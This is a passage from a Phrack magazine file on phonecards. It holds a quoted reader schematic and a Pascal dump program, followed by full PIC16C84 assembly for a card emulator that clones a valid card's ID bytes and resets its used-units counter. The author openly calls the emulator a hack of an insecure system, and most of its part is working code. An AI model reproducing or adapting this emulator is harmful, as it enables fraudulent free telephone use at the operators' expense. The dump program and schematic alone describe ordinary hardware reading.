  8278. |                      |   tv6  |    5 |   -  |  us  |
  8279. +----------------------+--------+------+------+------+
  8280. |                      |   tv7  |    5 |   -  |  us  |
  8281. +----------------------+--------+------+------+------+
  8282. |                      |   tv8  |   10 |   -  |  us  |
  8283. +----------------------+--------+------+------+------+
  8284.  
  8285.  
  8286.  
  8287. III) The Reader Schematic:
  8288.     ======================
  8289.  
  8290.    External 5V (Optional)
  8291.  
  8292. 5V o------,
  8293.       |                 /             T2  PNP      d13  r7 10
  8294. 0V o--,   |                /               BC 177     |\ |  _____
  8295.       |   |      ,-------o/   o--*------. E      C .--| >+-[_____]--------,
  8296.     __+__ |      |               |       \        /   |/ |                |
  8297.     \\\\\ |    __|__ Battery     |         \    /                         |
  8298.       |      -   22.5V       |       ---------                        |
  8299. .......   |      |               |   _____   |   _____                    |
  8300.        :  |    __+__             +--[_____]--*--[_____]--,                |
  8301.    D2  :  |    \\\\\                r6 150k     r5 15k   |                |
  8302. 4 o-------|---------------------------*------------------|-------------,  |
  8303.        :  |                           |   r3 220k       / C            |  |
  8304.    Ack :  |                           |   _____      |/    T1 - NPN    |  |
  8305. 10 o------|--------.                  '--[_____]-*---|      BC107      |  |
  8306.        :  |        |                      _____  |   |\                |  |
  8307.        : ,-,      ,-,                 +--[_____]-'      \ E            |  |
  8308.        : | |r2    | |r1               |  r4 390k         |             |  |
  8309.        : | |220   | |22k            __+__              __+__           |  |
  8310.        : |_|      |_|               \\\\\              \\\\\           |  |
  8311.        :  |  |\ |  |                                                   |  |
  8312.        :  *--| >+--|----------------*----------------------------------|--*
  8313.        :  |  |/ |  |          ,-----|-----------------------------,    |  |
  8314.        :  |  d1    |          |     |   ,----------,----------,   |    |  |
  8315.        :  |        |          |     *---|--*  Fuse | Reset *--|---'    |  |
  8316.        :  |        |          |     |   |----------|----------|        |  |
  8317.    D0  :  |        |          |   ,-|---|--*   I/O | Clk   *--|---,    |  |
  8318. 2 o-------|--------|----------'   | |   |----------|----------|   |    |  |
  8319.        :  |        |              | '---|--*   Vpp | R/W   *--|---|----'  |
  8320.   Busy :  |        |              |     |----------|----------|   |       |
  8321. 11 o------|--------|--------------' ,---|--*   Gnd | 5V    *  |   |       |
  8322.        :  |        |                |   '----------'-------|--'   |       |
  8323.    D1  :  |        |              __+__    Chip connector  |      |       |
  8324. 3 o-------|--------|--------,     \\\\\                    |      |       |
  8325.        :  |        |        '------------------------------|------'       |
  8326.   Str  :  |  |\ |  |                                       |              |
  8327. 1 o-------*--| >+--*----*----*----*----*-------------------'              |
  8328.        :   d2|/ |  |d3  |d4  |d5  |d6  |d7                                |
  8329.        :          -+-  -+-  -+-  -+-  -+-                                 |
  8330.        :          /_\  /_\  /_\  /_\  /_\                                 |
  8331.    D3  :           |    |    |    |    |   |\ | d8                        |
  8332. 5 o----------------*----|----|----|----|---| >+-------*-------------------'
  8333.        :                |    |    |    |   |/ |       |
  8334.        :                |    |    |    |              |
  8335.    D4  :                |    |    |    |   |\ | d9    |
  8336. 6 o---------------------*----|----|----|---| >+-------*
  8337.        :                     |    |    |   |/ |       |
  8338.        :                     |    |    |              |
  8339.    D5  :                     |    |    |   |\ | d10   |
  8340. 7 o--------------------------*----|----|---| >+-------*
  8341.        :                          |    |   |/ |       |
  8342.        :                          |    |              |
  8343.    D6  :                          |    |   |\ | d11   |
  8344. 8 o-------------------------------*----|---| >+-------*
  8345.        :                               |   |/ |       |
  8346.        :                               |              |
  8347.    D7  :                               |   |\ | d12   |
  8348. 9 o------------------------------------*---| >+-------'
  8349.        :                                   |/ |
  8350.        :
  8351.        :
  8352. 25 o------.
  8353.        :  |
  8354. .......:  |                                 d1 to d13: 1N4148
  8355.     __+__
  8356.     \\\\\
  8357.  
  8358. Centronics port
  8359.  
  8360.  
  8361.  
  8362.  
  8363. IV) The program:
  8364.     ===========
  8365.  
  8366.     The following program will enable you to read telecards on you PC if you
  8367. build the reader.
  8368.  
  8369. --------------- cut here (begin)
  8370. {*****************************************************************************}
  8371. {                             T E L E C A R D . PAS                           }
  8372. {*****************************************************************************}
  8373. {   This program enable you to dumb the memory of electronics phonecards      }
  8374. {   from all over the world, so that you will be able to see which country    }
  8375. {   the card is from how many units are left and so on ....                   }
  8376. {*****************************************************************************}
  8377. {                                                                             }
  8378. {                        Written by Stephane BAUSSON (1993)                   }
  8379. {                                                                             }
  8380. {                         Email: sbausson@ensem.u-nancy.fr                    }
  8381. {                                                                             }
  8382. {                       Snail Mail Address: 4, Rue de Grand                   }
  8383. {                                           F-88630 CHERMISEY                 }
  8384. {                                           France                            }
  8385. {                                                                             }
  8386. {*****************************************************************************}
  8387. {* Thanks to: Tomi Engdahl (Tomi.Engdahl@hut.fi)                             *}
  8388. {*****************************************************************************}
  8389.  
  8390. USES crt,dos;
  8391.  
  8392. CONST port_address=$378;     { lpr1 chosen }
  8393.  
  8394. TYPE string8=string[8];
  8395.      string2=string[2];
  8396.  
  8397. VAR reg         : registers;
  8398.     i,j         : integer;
  8399.     Data        : array[1..32] of byte;
  8400.     car         : char;
  8401.     byte_number : integer;
  8402.     displaying  : char;
  8403.  
  8404. {-----------------------------------------------------------------------------}
  8405.  
  8406. PROCEDURE Send(b:byte);
  8407.  
  8408.   BEGIN port[port_address]:=b;
  8409.   END;
  8410.  
  8411. {-----------------------------------------------------------------------------}
  8412.  
  8413. FUNCTION Get:byte;
  8414.  
  8415.   BEGIN get:=port[port_address+1];
  8416.   END;
  8417.  
  8418. {-----------------------------------------------------------------------------}
  8419. { FUNCTION dec2hexa_one(decimal_value):hexa_character_representation;         }
  8420. {                                                                             }
  8421. {       - convert a 4 bit long decimal number to hexadecimal.                 }
  8422. {-----------------------------------------------------------------------------}
  8423.  
  8424. FUNCTION dec2hexa_one(value:byte):char;
  8425.  
  8426.   BEGIN case value of
  8427.       0..9   : dec2hexa_one:=chr(value+$30);
  8428.       10..15 : dec2hexa_one:=chr(value+$37);
  8429.     END;
  8430.   END;
  8431.  
  8432. {-----------------------------------------------------------------------------}
  8433. { FUNCTION d2h(decimal_byte):string2;                                         }
  8434. {                                                                             }
  8435. {       - convert a decimal byte to its hexadecimal representation.           }
  8436. {-----------------------------------------------------------------------------}
  8437.  
  8438. FUNCTION d2h(value:byte):string2;
  8439.  
  8440.   VAR msbb,lsbb:byte;
  8441.  
  8442.   BEGIN msbb:=0;
  8443.     if ( value >= $80 ) then
  8444.     BEGIN msbb:=msbb+8;
  8445.           value:=value-$80;
  8446.     END;
  8447.     if ( value >= $40 ) then
  8448.     BEGIN msbb:=msbb+4;
  8449.           value:=value-$40;
  8450.     END;
  8451.     if ( value >= $20 ) then
  8452.     BEGIN msbb:=msbb+2;
  8453.           value:=value-$20;
  8454.     END;
  8455.     if ( value >= $10 ) then
  8456.     BEGIN msbb:=msbb+1;
  8457.           value:=value-$10;
  8458.     END;
  8459.  
  8460.     lsbb:=0;
  8461.     if ( value >= $08 ) then
  8462.     BEGIN lsbb:=lsbb+8;
  8463.           value:=value-$08;
  8464.     END;
  8465.     if ( value >= $04 ) then
  8466.     BEGIN lsbb:=lsbb+4;
  8467.           value:=value-$04;
  8468.     END;
  8469.     if ( value >= $02 ) then
  8470.     BEGIN lsbb:=lsbb+2;
  8471.           value:=value-$02;
  8472.     END;
  8473.     if ( value >= $01 ) then
  8474.     BEGIN lsbb:=lsbb+1;
  8475.           value:=value-$01;
  8476.     END;
  8477.     d2h := dec2hexa_one(msbb) + dec2hexa_one(lsbb);
  8478.   END;
  8479.  
  8480. {-----------------------------------------------------------------------------}
  8481.  
  8482. Function Binary( b : byte):string8;
  8483.  
  8484.   var weight : byte;
  8485.       s      : string8;
  8486.  
  8487.   BEGIN weight:=$80;
  8488.     s:='';
  8489.     while (weight > 0) do
  8490.     BEGIN if ((b and weight) = weight) then s:=s+'1'
  8491.           else s:=s+'0';
  8492.           weight:=weight div $02;
  8493.     END;
  8494.     Binary:=s;
  8495.   END;
  8496.  
  8497. {-----------------------------------------------------------------------------}
  8498.  
  8499. FUNCTION Units:byte;
  8500.  
  8501.   VAR  u, i : integer;
  8502.        s    : string8;
  8503.  
  8504.   BEGIN u:=0;
  8505.     i:=13;
  8506.     while (Data[i] = $FF) do
  8507.     BEGIN u:=u+8;
  8508.           i:=i+1;
  8509.     END;
  8510.     s:=Binary(Data[i]);
  8511.     while(s[1]='1') do
  8512.           BEGIN inc(u);
  8513.           s:=copy(s,2,length(s));
  8514.     END;
  8515.     units:=u;
  8516.   END;
  8517.  
  8518. {-----------------------------------------------------------------------------}
  8519.  
  8520. function Units_2:LongInt;
  8521.  
  8522.   BEGIN Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13];
  8523.   END;
  8524.  
  8525. {-----------------------------------------------------------------------------}
  8526.  
  8527. PROCEDURE Card_Type;
  8528.  
  8529.   BEGIN case Data[2] of
  8530.      $03: BEGIN write('Telecard - France - ');
  8531.             case Data[12] of
  8532.              $13: write('120 Units - ',units-130,' Units left');
  8533.              $06: write('50 Units - ',units-60,' Units left');
  8534.              $15: write('40 Units - ',units-40,' Units left');
  8535.             END;
  8536.           END;
  8537.      $2F:BEGIN write('Telecard - Germany - ', Units_2, ' Units left');
  8538.          END;
  8539.      $3B:BEGIN write('Telecard - Greece - ', Units_2, ' Units left');
  8540.          END;
  8541.      $83:BEGIN write('Telecard');
  8542.            case Data[12] of
  8543.              $1E: write(' - Sweden');
  8544.              $30: write(' - Norway');
  8545.              $33: write(' - Andorra');
  8546.              $3C: write(' - Ireland');
  8547.              $47: write(' - Portugal');
  8548.              $55: write(' - Czech Republic');
  8549.              $5F: write(' - Gabon');
  8550.              $65: write(' - Finland');
  8551.            END;
  8552.            if (Data[12] in [$30,$33,$3C,$47,$55,$65]) then
  8553.            BEGIN case ((Data[3] and $0F)*$100+Data[4]) of
  8554.               $012: write (' - 10 Units - ',units-12,' Units left');
  8555.               $024: write (' - 22 Units - ',units-24,' Units left');
  8556.               $027: write (' - 25 Units - ',units-27,' Units left');
  8557.               $032: write (' - 30 Units - ',units-32,' Units left');
  8558.               $052: write (' - 50 Units - ',units-52,' Units left');
  8559.               $067: write (' - 65 Units - ',units-62,' Units left');
  8560.               $070: write (' - 70 Units - ',units-70,' Units left');
  8561.               $102: write (' - 100 Units - ',units-102,' Units left');
  8562.               $152: write (' - 150 Units -  ',units-152,' Units left');
  8563.              END;
  8564.             END;
  8565. {                    write(' - N0 ',Data[5]*$100+Data[6]);}
  8566.           END;
  8567.     END;
  8568.   END;
  8569.  
  8570. {-----------------------------------------------------------------------------}
  8571.  
  8572. PROCEDURE waiting;
  8573.  
  8574.   BEGIN send($00);
  8575.     write('Enter a card in the reader and press a key ...');
  8576.     repeat until key pressed;
  8577.     gotoxy(1, wherey);
  8578.     clreol;
  8579.   END;
  8580.  
  8581. {-----------------------------------------------------------------------------}
  8582.  
  8583. PROCEDURE Full_Displaying;
  8584.  
  8585.   BEGIN writeln('Memory dump:');
  8586.     for i:=1 to 80 do write('-');
  8587.     for i:=1 to (byte_number div 6 + 1) do
  8588.     BEGIN for j:=1 to 6 do
  8589.           BEGIN if j+6*(i-1) <= byte_number then write(binary(Data[j+6*(i-1)]):9);
  8590.           END;
  8591.           gotoxy(60,wherey);
  8592.           for j:=1 to 6 do
  8593.           if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),' ');
  8594.           writeln;
  8595.     END;
  8596.     for i:=1 to 80 do write('-');
  8597.     Card_Type;
  8598.     writeln;
  8599.   END;
  8600.  
  8601. {-----------------------------------------------------------------------------}
  8602.  
  8603. PROCEDURE Short_Displaying;
  8604.  
  8605.   VAR j : integer;
  8606.  
  8607.   BEGIN for j:=1 to byte_number do
  8608.     BEGIN write(d2h(Data[j]),' ');
  8609.     END;
  8610.     writeln;
  8611.   END;
  8612.  
  8613. {-----------------------------------------------------------------------------}
  8614.  
  8615. PROCEDURE Reading;
  8616.  
  8617.   VAR i, j  : integer;
  8618.       Value : byte;
  8619.  
  8620.   BEGIN send($FE);
  8621.     send($F8);
  8622.     for i:=1 to 32 do
  8623.     BEGIN Value:=0;
  8624.           for j:=1 to 8 do
  8625.           BEGIN Value:=Value*$02 + ((get and $08) div $08);
  8626.             send($FB);
  8627.             delay(1);
  8628.             send($F8);
  8629.           END;
  8630.           Data[i]:=Value;
  8631.     END;
  8632.     case displaying of
  8633.       'F':full_displaying;
  8634.       'S':short_displaying;
  8635.     END;
  8636.   END;
  8637.  
  8638. {-----------------------------------------------------------------------------}
  8639.  
  8640. PROCEDURE writing;
  8641.  
  8642.   VAR i,n:integer;
  8643.       car:char;
  8644.  
  8645.   BEGIN write('Which bit do you want to set to "1" : ');
  8646.     readln(n);
  8647.  
  8648.     waiting;
  8649.     car:=readkey;
  8650.  
  8651.     send($FA);
  8652.     send($F8);
  8653.     for i:=1 to n do
  8654.     BEGIN send($F9);
  8655.           if i=n then
  8656.           BEGIN send($FD);
  8657.             delay(20);
  8658.             send($FF);
  8659.             delay(20);
  8660.           END;
  8661.           send($FB);
  8662.     END;
  8663.     reading;
  8664.   END;
  8665.  
  8666. {-----------------------------------------------------------------------------}
  8667.  
  8668. PROCEDURE Saving;
  8669.  
  8670.   VAR filename : string;
  8671.       f        : text;
  8672.       i        : word;
  8673.  
  8674.   BEGIN write('Enter the filename: ');
  8675.     readln(filename);
  8676.     assign(f, filename);
  8677.     rewrite(f);
  8678.     for i:=1 to byte_number do write(f,d2h(Data[i]),' ');
  8679.     close(f);
  8680.   END;
  8681.  
  8682. {-----------------------------------------------------------------------------}
  8683.  
  8684. PROCEDURE initialize;
  8685.  
  8686.   VAR i : integer;
  8687.  
  8688.   BEGIN byte_number:=32;
  8689.     displaying:='F';
  8690.     clrscr;
  8691.     writeln(' 1 - to dump a 256 bits card');
  8692.     writeln(' 2 - to dump a 128 bits card');
  8693.     writeln(' F - to display in full format');
  8694.     window(41,1,80,25);
  8695.     writeln(' S  - to display in short format');
  8696.     writeln(' F2 - to save in a file');
  8697.     writeln(' Q  - to exit the program');
  8698.     window(1,4,80,25);
  8699.     for i:=1 to 80 do write('=');
  8700.     window(1,5,80,25);
  8701.   END;
  8702.  
  8703. {=============================================================================}
  8704.  
  8705. BEGIN initialize;
  8706.       repeat waiting;
  8707.          car:=upcase(readkey);
  8708.          case car of
  8709.           'W':writing;
  8710.           'Q':;
  8711.           '1':byte_number:=32;
  8712.           '2':byte_number:=16;
  8713.           'F','S':displaying:=car;
  8714.           #00: BEGIN car:=readkey;
  8715.              if car=#60 then saving;
  8716.            END;
  8717.           else reading;
  8718.          END;
  8719.       until car='Q';
  8720. END.
  8721. --------------- cut here (end)
  8722.  
  8723.  
  8724.  
  8725.  
  8726.  
  8727.     _/_/_/_/_/               Stephane BAUSSON
  8728.        _/_/_/_/_/    Engineering student at ENSEM (Nancy - France)
  8729.       _/_/_/_/_/   Smail: 4, Rue de Grand, F-88630 CHERMISEY, France
  8730.      _/_/_/_/_/
  8731.     _/_/_/_/_/            Email: sbausson@ensem.u-nancy.fr
  8732.  
  8733. ------------------------------------------------------------------------------
  8734. <End of text quoted from Stephane Bausson's text about the telephone cards>.
  8735.  
  8736.                               ==Phrack Magazine==
  8737.  
  8738.                  Volume Seven, Issue Forty-Eight, File 11 of 18
  8739.  
  8740.               Electronic Telephone Cards: How to make your own!
  8741.               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8742.                                 (continued)
  8743.  
  8744.  
  8745.  
  8746. The Program:
  8747. ~~~~~~~~~~~~
  8748. Well, when I saw this phile about the cards the first time, about a year
  8749. ago I quickly realized that this system is very unsecure and really
  8750. needs to be hacked. So, now I present you with a piece of software for
  8751. the PIC 16C84 RISC micro-controller from Microchip that will take care
  8752. of emulating the cards used by Schlumberger and others. This system is
  8753. to be found in Scandinavia (Sweden, Norway and Finland), Spain, France
  8754. and other countries. I do know that France probably needs some small
  8755. modifications for this to work, but I see no reason to as why it
  8756. shouldn't do so! For this to work, you need to have access to a PROM
  8757. burner which can handle the PIC 16C84, or you might just build one
  8758. yourself as I include some plans for that in the UUEncoded block to be
  8759. found at the end of this phile. First of all, you have to read off the
  8760. first 12 bytes of data from a valid card from the country you wish your
  8761. emulator to work in. This because I don't think it would be a good idea
  8762. to publish stolen card identities in Phrack. Then you simply enter those
  8763. 12 bytes of data in the proper place in my program and compile it.
  8764. That's it... And since I happen to choose a version of the PIC with
  8765. internal Data EEPROM, that means that the first 12 locations of the Data
  8766. EEPROM should contain the card id bytes. As of today this code should
  8767. work smooth and fine, but maybe you'll need to modify it later on when
  8768. Schlumberger gets tired of my hack. But since the PIC is a very fast and
  8769. powerful micro-controller it might be quite hard for them to come up
  8770. with a solution to this problem. Let's have a look at the PIC Software!
  8771. (Note that the current version of Microchip's PICSTART 16B package is
  8772. unable to program the DATA EEPROM array in the 16C84 so if you are going
  8773. to use that one, use the other version of the source code which you'll
  8774. find in the UUEncoded part!).
  8775.  
  8776. <Start of TELECARD.ASM>.
  8777. ==============================================================================
  8778.  
  8779.     TITLE   "ISO 7816 Synchronous Memory Card Emulator"
  8780.     LIST    P=PIC16C84, R=HEX
  8781.     INCLUDE "PICREG.EQU"
  8782.  
  8783. ; PIC16C84 I/O Pin Assignment List
  8784.  
  8785. CRD_CLK         equ     0       ; RB0 + RA4 = Card Clock
  8786. CRD_DTA         equ     0       ; RA0 = Card Data Output
  8787. CRD_RST         equ     1       ; RB1 = Card Reset, Low-Active
  8788. CRD_WE          equ     7       ; RB7 = Card Write-Enable, Hi-Active
  8789.  
  8790. ; PIC16C84 RAM Register Assignments
  8791.  
  8792. CRD_ID          equ     0x00c   ; Smartcard ID, 12 bytes
  8793. FUSCNT          equ     0x018   ; Fused units counter
  8794. BITCNT          equ     0x019   ; Bitcounter
  8795. LOOPCNT         equ     0x01a   ; Loop Counter
  8796. EE_FLAG         equ     0x01b   ; EEPROM Write Flag
  8797. TEMP1           equ     0x01c   ; Temporary Storage #1
  8798. TEMP2           equ     0x01d   ; Temporary Storage #2
  8799. TEMP3           equ     0x01e   ; Temporary Storage #3
  8800. TEMP4           equ     0x01f   ; Temporary Storage #4
  8801. TEMP_W          equ     0x02e   ; Temporary W Save Address
  8802. TEMP_S          equ     0x02f   ; Temporary STATUS Save Address
  8803.  
  8804.     org     0x2000          ; Chip ID Data
  8805.     dw      042,042,042,042
  8806.  
  8807.     org     0x2007          ; Configuration Fuses
  8808.     dw      B'00000001'
  8809.  
  8810.     org     0x2100          ; Internal Data EEPROM Memory (Card ID!!!)
  8811.     db      0x081,0x042,0x000,0x011,0x022,0x033
  8812.     db      0x044,0x055,0x066,0x077,0x011,0x084
  8813.     db      0x002           ; Default used up credits value
  8814.  
  8815.     org     PIC84           ; Reset-vector
  8816.     goto    INIT            ; Jump to initialization routine
  8817.  
  8818.     org     INTVEC          ; Interrupt-vector
  8819.     push                    ; Save registers
  8820.     call    INTMAIN         ; Call main interrupt routine
  8821.     pop                     ; Restore registers
  8822.     retfie                  ; return from interrupt & clear flag
  8823.  
  8824.     org     0x010           ; Start address for init rout.
  8825. INIT    bsf     STATUS,RP0      ; Access register bank 1
  8826.     clrwdt                  ; Clear watchdog timer
  8827.     movlw   B'11101000'     ; OPTION reg. settings
  8828.     movwf   OPTION          ; Store in OPTION register
  8829.     movlw   B'11111110'     ; Set PORT A Tristate Latches
  8830.     movwf   TRISA           ; Store in PORT A tristate register
  8831.     movlw   B'11111111'     ; Set PORT B Tristate Latches
  8832.     movwf   TRISB           ; Store in PORT B tristate register
  8833.     bcf     STATUS,RP0      ; Access register bank 0
  8834.     clrf    RTCC            ; Clear RTCC
  8835.     clrf    PORTA           ; Clear PORTA
  8836.     clrf    PORTB           ; Clear PORTB
  8837.     movlw   0d              ; 13 bytes to copy
  8838.     movwf   LOOPCNT         ; Store in LOOPCNT
  8839.     movlw   0c              ; Start storing at $0c in RAM
  8840.     movwf   FSR             ; Store in FSR
  8841.     clrf    EEADR           ; Start at EEPROM Address 0
  8842. EECOPY
  8843.     bsf     STATUS,RP0      ; Access register bank 1
  8844.     bsf     EECON1,RD       ; Set EECON1 Read Data Flag
  8845.     bcf     STATUS,RP0      ; Access register bank 0
  8846.     movfw   EEDATA          ; Read one byte of EEPROM Data
  8847.     movwf   INDIR           ; Store in RAM pointed at by FSR
  8848.     incf    FSR             ; Increase FSR pointer
  8849.     incf    EEADR           ; Increase EEPROM Address Pointer
  8850.     decfsz  LOOPCNT,1       ; Decrease LOOPCNT until it's 0
  8851.     goto    EECOPY          ; Go and get some more bytes!
  8852.     bsf     STATUS,RP0      ; Access register bank 1
  8853.     bcf     EECON1,EEIF     ; Clear EEPROM Write Int. Flag
  8854.     bcf     EECON1,WREN     ; EEPROM Write Disable
  8855.     bcf     STATUS,RP0      ; Access register bank 0
  8856.     movlw   B'10010000'     ; Enable INT Interrupt
  8857.     movwf   INTCON          ; Store in INTCON
  8858.  
  8859. MAIN    bsf     STATUS,RP0      ; Access register bank 1
  8860.     btfsc   EECON1,WR       ; Check if EEPROM Write Flag Set
  8861.     goto    MAIN            ; Skip if EEPROM Write is Completed
  8862.     bcf     EECON1,EEIF     ; Reset Write Completion Flag
  8863.     bcf     EECON1,WREN     ; EEPROM Write Disable
  8864.     bcf     STATUS,RP0      ; Access register bank 0
  8865.     btfss   EE_FLAG,LSB     ; Check for EEPROM Write Flag
  8866.     goto    MAIN            ; If not set, jump back and wait some more
  8867.     clrf    EE_FLAG         ; Clear EEPROM Write Flag
  8868.     movlw   0c              ; Units is stored in byte $0c
  8869.     movwf   EEADR           ; Store in EEPROM Address Counter
  8870.     movfw   FUSCNT          ; Get fused units counter
  8871.     movwf   EEDATA          ; Store in EEDATA
  8872.     bsf     STATUS,RP0      ; Access register bank 1
  8873.     bsf     EECON1,WREN     ; EEPROM Write Enable
  8874.     bcf     INTCON,GIE      ; Disable all interrupts
  8875.     movlw   055             ; Magic Number #1 for EEPROM Write
  8876.     movwf   EECON2          ; Store in EECON2
  8877.     movlw   0aa             ; Magic Number #2 for EEPROM Write
  8878.     movwf   EECON2          ; Store in EECON2
  8879.     bsf     EECON1,WR       ; Execute EEPROM Write
  8880.     bsf     INTCON,GIE      ; Enable all interrupts again!
  8881.     bcf     STATUS,RP0      ; Access register bank 0
  8882.     goto    MAIN            ; Program main loop!
  8883.  
  8884. INTMAIN btfsc   INTCON,INTF     ; Check for INT Interrupt
  8885.     goto    INTMAIN2        ; If set, jump to INTMAIN2
  8886.     movlw   B'00010000'     ; Enable INT Interrupt
  8887.     movwf   INTCON          ; Store in INTCON
  8888.     return
  8889.  
  8890. INTMAIN2
  8891.     bcf     STATUS,RP0      ; Access register bank 0
  8892.     bsf     PORTA,CRD_DTA   ; Set Data Output High
  8893.     btfsc   PORTB,CRD_RST   ; Check if reset is low
  8894.     goto    NO_RST          ; If not, skip reset sequence
  8895.     movfw   RTCC            ; Get RTCC Value
  8896.     movwf   TEMP4           ; Store in TEMP4
  8897.     clrf    RTCC            ; Clear RTCC
  8898.     movlw   055             ; Subtract $55 from TEMP4
  8899.     subwf   TEMP4,0         ; to check for card reset....
  8900.     bnz     NO_RST2         ; If not zero, jump to NO_RST
  8901.     movlw   02              ; Unused one has $02 in FUSCNT
  8902.     movwf   FUSCNT          ; Store full value in FUSCNT
  8903.     bsf     EE_FLAG,LSB     ; Set EEPROM Write Flag
  8904. NO_RST2 bcf     INTCON,INTF     ; Clear INT Interrupt Flag
  8905.     return                  ; Mission Accomplished, return to sender
  8906.  
  8907. NO_RST  movfw   RTCC            ; Get RTCC Value
  8908.     movwf   BITCNT          ; Copy it to BITCNT
  8909.     movwf   TEMP1           ; Copy it to TEMP1
  8910.     movwf   TEMP2           ; Copy it to TEMP2
  8911.     movlw   060             ; Load W with $60
  8912.     subwf   TEMP1,0         ; Subtract $60 from TEMP1
  8913.     bz      CREDIT          ; If it is equal to $60
  8914.     bc      CREDIT          ; or greater, then skip to units area
  8915.     rrf     TEMP2           ; Rotate TEMP2 one step right
  8916.     rrf     TEMP2           ; Rotate TEMP2 one step right
  8917.     rrf     TEMP2           ; Rotate TEMP2 one step right
  8918.     movlw   0f              ; Load W with $f
  8919.     andwf   TEMP2,1         ; And TEMP2 with W register
  8920.     movfw   TEMP2           ; Load W with TEMP2
  8921.     addlw   0c              ; Add W with $0c
  8922.     movwf   FSR             ; Store data address in FSR
  8923.     movfw   INDIR           ; Get data byte pointed at by FSR
  8924.     movwf   TEMP3           ; Store it in TEMP3
  8925.     movlw   07              ; Load W with $07
  8926.     andwf   TEMP1,1         ; And TEMP1 with $07
  8927.     bz      NO_ROT          ; If result is zero, skip shift loop
  8928. ROTLOOP rlf     TEMP3           ; Shift TEMP3 one step left
  8929.     decfsz  TEMP1,1         ; Decrement TEMP1 until zero
  8930.     goto    ROTLOOP         ; If not zero, repeat until it is!
  8931. NO_ROT  btfss   TEMP3,MSB       ; Check if MSB of TEMP3 is set
  8932.     bcf     PORTA,CRD_DTA   ; Clear Data Output
  8933.     bcf     INTCON,INTF     ; Clear INT Interrupt Flag
  8934.     return                  ; Mission Accomplished, return to sender
  8935.  
  8936. CREDIT  btfss   PORTB,CRD_WE    ; Check if Card Write Enable is High
  8937.     goto    NO_WRT          ; Abort write operation if not...
  8938.     btfss   PORTB,CRD_RST   ; Check if Card Reset is High
  8939.     goto    NO_WRT          ; Abort write operation if not...
  8940.     incf    FUSCNT          ; Increase used-up units counter
  8941.     bsf     EE_FLAG,LSB     ; Set EEPROM Write-Flag
  8942.     bcf     INTCON,INTF     ; Clear INT Interrupt Flag
  8943.     return                  ; Mission Accomplished, return to sender
  8944.  
  8945. NO_WRT  movlw   060             ; Load W with $60
  8946.     subwf   BITCNT,1        ; Subtract $60 from BITCNT
  8947.     movfw   FUSCNT          ; Load W with FUSCNT
  8948.     subwf   BITCNT,1        ; Subtract FUSCNT from BITCNT
  8949.     bnc     FUSED           ; If result is negative, unit is fused
  8950.     bcf     PORTA,CRD_DTA   ; Clear Data Output
  8951. FUSED   bcf     INTCON,INTF     ; Clear INT Interrupt Flag
  8952.     return                  ; Mission Accomplished, return to sender
  8953.     
  8954.     END
  8955.  
  8956. ==============================================================================
  8957. <End of TELECARD.ASM>.
  8958.  
  8959. <Start of PICREG.EQU>.
  8960. ==============================================================================
  8961.  
  8962. ; PIC16Cxx Micro-controller Include File
  8963.  
  8964. PIC54           equ     0x1ff   ; PIC16C54 Reset Vector
  8965. PIC55           equ     0x1ff   ; PIC16C55 Reset Vector
  8966. PIC56           equ     0x3ff   ; PIC16C56 Reset Vector
  8967. PIC57           equ     0x7ff   ; PIC16C57 Reset Vector
  8968. PIC71           equ     0x000   ; PIC16C71 Reset Vector
  8969. PIC84           equ     0x000   ; PIC16C84 Reset Vector
  8970. INTVEC          equ     0x004   ; PIC16C71/84 Interrupt Vector
  8971.  
  8972. INDIR           equ     0x000   ; Indirect File Reg Address Register
  8973. RTCC            equ     0x001   ; Real Time Clock Counter
  8974. PCL             equ     0x002   ; Program Counter Low Byte
  8975. STATUS          equ     0x003   ; Status Register
  8976. FSR             equ     0x004   ; File Select Register
  8977. PORTA           equ     0x005   ; Port A I/O Register
  8978. PORTB           equ     0x006   ; Port B I/O Register
  8979. PORTC           equ     0x007   ; Port C I/O Register
  8980. ADCON0          equ     0x008   ; PIC16C71 A/D Control Reg 0
  8981. ADRES           equ     0x009   ; PIC16C71 A/D Converter Result Register
  8982. EEDATA          equ     0x008   ; PIC16C84 EEPROM Data Register
  8983. EEADR           equ     0x009   ; PIC16C84 EEPROM Address Register
  8984. PCLATH          equ     0x00a   ; Program Counter High Bits
  8985. INTCON          equ     0x00b   ; Interrupt Control Register
  8986. TRISA           equ     0x005   ; Port A I/O Direction Register
  8987. TRISB           equ     0x006   ; Port B I/O Direction Register
  8988. TRISC           equ     0x007   ; Port C I/O Direction Register
  8989. ADCON1          equ     0x008   ; PIC16C71 A/D Control Reg 1
  8990. EECON1          equ     0x008   ; PIC16C84 EEPROM Control Reg. 1
  8991. EECON2          equ     0x009   ; PIC16C84 EEPROM Control Reg. 2
  8992. OPTION          equ     0x001   ; Option Register
  8993.  
  8994. MSB             equ     0x007   ; Most-Significant Bit
  8995. LSB             equ     0x000   ; Least-Significant Bit
  8996. TRUE            equ     1
  8997. YES             equ     1
  8998. FALSE           equ     0
  8999. NO              equ     0
  9000.  
  9001. ; Status Register (f03) Bits
  9002.  
  9003. CARRY           equ     0x000   ; Carry Bit
  9004. C               equ     0x000   ; Carry Bit
  9005. DCARRY          equ     0x001   ; Digit Carry Bit
  9006. DC              equ     0x001   ; Digit Carry Bit
  9007. Z_BIT           equ     0x002   ; Zero Bit
  9008. Z               equ     0x002   ; Zero Bit
  9009. P_DOWN          equ     0x003   ; Power Down Bit
  9010. PD              equ     0x003   ; Power Down Bit
  9011. T_OUT           equ     0x004   ; Watchdog Time-Out Bit
  9012. TO              equ     0x004   ; Watchdog Time-Out Bit
  9013. RP0             equ     0x005   ; Register Page Select 0
  9014. RP1             equ     0x006   ; Register Page Select 1
  9015. IRP             equ     0x007   ; Indirect Addressing Reg. Page Sel.
  9016.  
  9017. ; INTCON Register (f0b) Bits
  9018.  
  9019. RBIF            equ     0x000   ; RB Port change interrupt flag
  9020. INTF            equ     0x001   ; INT Interrupt Flag
  9021. RTIF            equ     0x002   ; RTCC Overflow Interrupt Flag
  9022. RBIE            equ     0x003   ; RB Port Ch. Interrupt Enable
  9023. INTE            equ     0x004   ; INT Interrupt Enable
  9024. RTIE            equ     0x005   ; RTCC Overflow Int. Enable
  9025. ADIE            equ     0x006   ; PIC16C71 A/D Int. Enable
  9026. EEIE            equ     0x006   ; PIC16C84 EEPROM Write Int. Enable
